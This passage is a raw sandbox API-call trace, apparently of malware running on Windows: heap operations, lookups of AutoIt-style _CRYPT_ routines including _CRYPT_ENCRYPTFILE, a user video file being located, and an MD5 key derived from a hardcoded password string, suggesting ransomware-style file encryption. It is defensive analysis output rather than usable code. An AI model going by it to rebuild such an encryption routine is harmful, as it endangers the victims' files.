out: hHeap=0x1780000) returned 1 [0102.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0102.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0102.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac500 [0102.124] PeekMessageW (in: lpMsg=0x144ea0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ea0c) returned 0 [0102.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac500 | out: hHeap=0x1780000) returned 1 [0102.124] PeekMessageW (in: lpMsg=0x144ea0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ea0c) returned 0 [0102.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0102.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0102.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0102.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0102.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0102.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0102.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0102.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0102.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0102.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0102.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0102.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0102.125] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0102.125] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0102.125] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0102.125] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0102.125] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0102.125] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0102.125] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0102.125] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0102.125] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0102.125] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0102.125] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0102.125] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0102.125] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0102.125] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0102.125] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43ca550, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0102.125] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0102.126] GetProcAddress (hModule=0x772d0000, lpProcName="CloseHandle") returned 0x7733eab0 [0102.126] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0102.126] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0102.126] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0102.126] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0102.126] CloseHandle (hObject=0x298) returned 1 [0102.126] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0102.126] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0102.126] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0102.126] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0102.126] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0102.126] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0102.126] FreeLibrary (hLibModule=0x772d0000) returned 1 [0102.126] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0102.126] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0102.126] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0102.126] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0102.126] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0102.126] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0102.126] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0102.126] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0102.126] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0102.126] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0102.126] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0102.127] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0102.127] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0102.127] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0102.127] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0102.127] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0102.127] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0102.127] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9e90 | out: hHeap=0x1780000) returned 1 [0102.127] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0102.127] PeekMessageW (in: lpMsg=0x144ea0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ea0c) returned 0 [0102.127] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0102.127] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d08 | out: hHeap=0x1780000) returned 1 [0102.127] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0102.127] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0102.127] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0102.127] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0102.127] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0102.127] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0102.127] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0102.127] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0102.127] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0102.127] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0102.127] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0102.127] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0102.127] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0102.127] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0102.127] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0102.127] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0102.127] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0102.127] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0102.127] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0102.127] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0102.128] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0102.128] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b60 | out: hHeap=0x1780000) returned 1 [0102.128] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0102.128] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0102.128] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0102.128] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0102.128] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0102.128] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0102.128] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0102.128] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0102.128] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0102.128] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0102.128] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0102.128] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0102.128] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0102.128] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0102.128] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0102.128] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0102.128] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0102.128] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0102.128] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0102.128] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0102.128] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0102.128] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0102.128] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0102.128] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0102.128] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0102.129] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0102.129] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0102.129] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\jyNO5NcyIG2nrd\\IQ0I29Q qVTPWYuVmY.avi", lpFindFileData=0x144e620 | out: lpFindFileData=0x144e620*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56c81d70, ftCreationTime.dwHighDateTime=0x1d5ee74, ftLastAccessTime.dwLowDateTime=0x2eec7760, ftLastAccessTime.dwHighDateTime=0x1d5ebb3, ftLastWriteTime.dwLowDateTime=0x2eec7760, ftLastWriteTime.dwHighDateTime=0x1d5ebb3, nFileSizeHigh=0x0, nFileSizeLow=0xb6e8, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="IQ0I29Q qVTPWYuVmY.avi", cAlternateFileName="IQ0I29~1.AVI")) returned 0x41ac540 [0102.129] FindClose (in: hFindFile=0x41ac540 | out: hFindFile=0x41ac540) returned 1 [0102.129] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0102.129] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0102.129] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0102.129] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0102.129] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0102.129] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0102.129] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0102.129] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0102.129] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0102.130] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0102.130] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0102.130] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0102.130] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796de8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0102.130] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0102.130] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796d88, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0102.130] CryptAcquireContextA (in: phProv=0x144e300, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e300*=0x41a5250) returned 1 [0102.131] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0102.131] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0102.131] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0102.131] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0102.131] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0102.131] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0102.131] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0102.131] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0102.131] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0102.131] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0102.131] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43cad60, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0102.131] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e070 | out: phHash=0x144e070) returned 1 [0102.131] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0102.131] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2b48, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0102.131] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0102.131] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0102.131] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2b48, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0102.131] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0102.131] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0102.132] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0102.132] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43cacd0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0102.132] CryptHashData (hHash=0x41ac040, pbData=0x17e2ae8, dwDataLen=0x22, dwFlags=0x1) returned 1 [0102.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0102.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea730 [0102.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fc8 [0102.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0102.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0102.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0102.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0102.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0102.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0102.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0102.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ac0 [0102.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0102.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0102.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0102.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0102.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e08 [0102.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2728 [0102.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0102.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0102.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0102.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0102.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafd0 [0102.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0102.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0102.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0102.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadd8 [0102.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0102.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a30 [0102.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a10 [0102.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9c68 [0102.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ac0 [0102.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0102.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2940 [0102.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d88 [0102.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a90 [0102.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac140 [0102.133] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0102.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ac0 [0102.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0102.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0102.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ad0 [0102.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0102.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ce8 [0102.133] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0102.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cab80 [0102.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0102.133] PeekMessageW (in: lpMsg=0x144e03c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e03c) returned 0 [0102.133] RtlAllocateHeap 